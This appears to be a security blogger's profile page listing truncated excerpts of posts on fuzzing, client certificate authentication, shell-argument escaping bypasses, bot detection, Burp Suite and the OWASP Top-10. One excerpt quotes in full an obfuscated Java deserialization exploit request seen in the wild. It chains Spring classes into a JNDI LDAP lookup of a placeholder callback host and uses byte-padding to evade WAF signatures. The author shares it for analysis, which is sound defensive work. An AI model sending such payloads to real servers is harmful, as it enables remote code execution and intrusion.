In a few words: we don’t need that crazy acceleration for Tesla cars and Hyperloop in daily life. It’s a lot of fun, for sure, and a marketing feature that puts electric cars in the supercar bucket. At the same time, that crazy acceleration trains people to take overloads. In my personal experience with a Tesla Model 3 Performance for two years, I have to say that it’s not just fun to hit the gas pedal in full, but also training for the vestibular system. It works for you and your passengers.
Look, it’s logical. The future of Earth transportation definitely should be…
Fuzzing is everything ;) It’s the most useful and effective hacking technique, for sure. At the same time, fuzzing is not just randomly hitting applications or binaries with random bytes.
It’s more about ideas, a deep understanding of data formats and application flows, technology stacks, and a lot of other things. It’s more about assumptions on how the particular application was designed and built than about randomness.
In this series of posts, I wanna share some experience with JSON fuzzing that I’ve gained over the last 12 years of security audits.
First of all, JSON is a serialization format; it’s…
I’ve just found a variant of a Struts exploit that surprised me with its obfuscation technique:
GET /?%01%00java.util.HashMa%f0%01%02%01%01org.springframework.aop.target.HotSwappableTargetSourc%e5%01%01%02%ef%01org.springframework.aop.aspectj.autoproxy.AspectJAwareAdvisorAutoProxyCreator$PartiallyComparableAdvisorHolder%01%01%03org.springframework.aop.aspectj.AspectJPointcutAdviso%f2%01%01%04org.springframework.aop.aspectj.AspectJAroundAdvic%e5%01%00%00%00%01%05%cc%01org.springframework.aop.aspectj.annotation.BeanFactoryAspectInstanceFactory%01%00%01%06org.springframework.jndi.support.SimpleJndiBeanFactor%f9%01%01%07org.springframework.jndi.JndiTemplat%e5%01%00%01%08org.apache.commons.logging.impl.NoOpLo%e7%01%01%08%01%01%01%00%01%00%01%09java.util.HashSe%f4%01%01%03%01%c9%03ldap%3a%2f%2fxxxxxxxxxxxxxxxxxxxxxxxxx.burpcollaborator.net%2f%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%01%00%01%00%0e%00%00%01%01%0ajava.lang.Objec%f4%00%00%00%00%00%00%01toStrin%e7%01%01%00%00%00%00%00%00%01%01%03%01%01%01%01%0bcom.sun.org.apache.xpath.internal.objects.XStrin%e7%01%03%01%85%ee%ac%a5%00%17%10%00%01%01%13=1 HTTP/1.1
This is %01%00 obfuscation, plus Unicode multibyte encoding.
Do you have any thoughts on what it is? It seems like Java is skipping %01 bytes in Unicode sequences, isn’t it?
I’m pretty sure that the only use for such comprehensive obfuscation is to bypass signatures for WAFs/IPS/IDS/etc. So, it seems like somebody really knows how to cook bypasses for deserialization exploits, at least.
BTW, which Spring vulnerability takes exploits right from the URI? Or is this the new https://nvd.nist.gov/vuln/detail/CVE-2019-9212 Hessian RCE exploited in the wild?
In the first story, I described some issues related to client certificate authentication implementations in environments with load balancers. This time I’d like to mention some typical issues in custom certificate validation processes where a developer does this themselves in application code.
Let’s formalize the task as custom authentication based on user certificates. Now, let’s divide this task from the architecture perspective:
Or, more technically:
The first research related to this technique, as I believe, dates from March 2013. It described how to deal with escapeshellarg() and other escaping functions used to sanitize data in shell calls like system(), passthru(), exec() and others. This technique became very popular later, especially after a lot of sendmail exploits used it.
In my last (and the first, BTW) Twitch stream I tried to find a similar issue in Symfony (as part of Laravel) but found only a DoS way to exploit it in 30 minutes of research. …
Bots are noisy, like really. And dangerous as well, especially if they can crawl and increase usage of legitimate operations like item catalog retrieval in the case of e-commerce. I mean, we have a lot of reasons not to like bots and to count this problem as a cybersecurity threat, which does not need to be explained in detail.
In this post, I’d like to share an idea on how to detect some bots based on non-browser engines. As you can see in the title, it’s based on CSP.
The main reason for this research (most likely a brainstorm) was an ability…
I love Burp Suite, like really. It’s the most convenient tool to visualize what’s happening with apps and what requests look like, and to test simple things like XSS injection.
At the same time, it’s really hard for me to do something more complicated, like implementing custom fuzzing while having to put all the markers into Intruder. It’s unbelievably hard to make my own detections and run them in my own way. At the same time, fuzzing is a super important application testing technique. Recently I mentioned avoiding fuzzing as #5 in my Top 5 security audit fails: https://medium.com/@d0znpp/top-5-my-own-security-audit-fails-d17320bbb980
Although…
Sometimes we need to improve web authentication with client certificates. It’s much better than passwords, allows enabling a 2nd factor because of hardware keys, and just sounds so strong, doesn’t it? ;)
Let’s look inside it to understand how secure it is and what to check to be sure that you didn’t reduce the security level of your company when implementing client certificate authentication. As always, it’s not a cryptography-related question, but an implementation risk. In this article, I’ll sum up all of our penetration testing experience to make a client certificate authentication security checklist.
Load balancers set HTTP headers for…
I have been in application security since 2009. Since then I have been involved in more than 300 different projects and sometimes even discovered new things like SSRF or the first XXE OOB FTP exploitation. Today I’d like to talk about my fails during my 300+ projects to ensure you don’t repeat my mistakes. Interestingly, all of the same fiascos were repeated time and time again by the many security folks I’ve talked to. So, here they are.
This is the last part of my trilogy about the OWASP Top-10 2017 risks. The two previous parts (one and two) described the A1-A6 risks, and this time I’d like to not just explain the A7-A10 risks but also draw an intersection or overlap Venn diagram of them. I hope this diagram will clarify why questions about “OWASP Top-10 coverage” are inherently inaccurate.
Let’s start with the A7-A10 then.
I’m sure that everybody knows what this is. But once again, this XSS risk in OWASP does not necessarily mean there is an XSS vulnerability under the covers. The same A7 risk can happen…
CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in real time.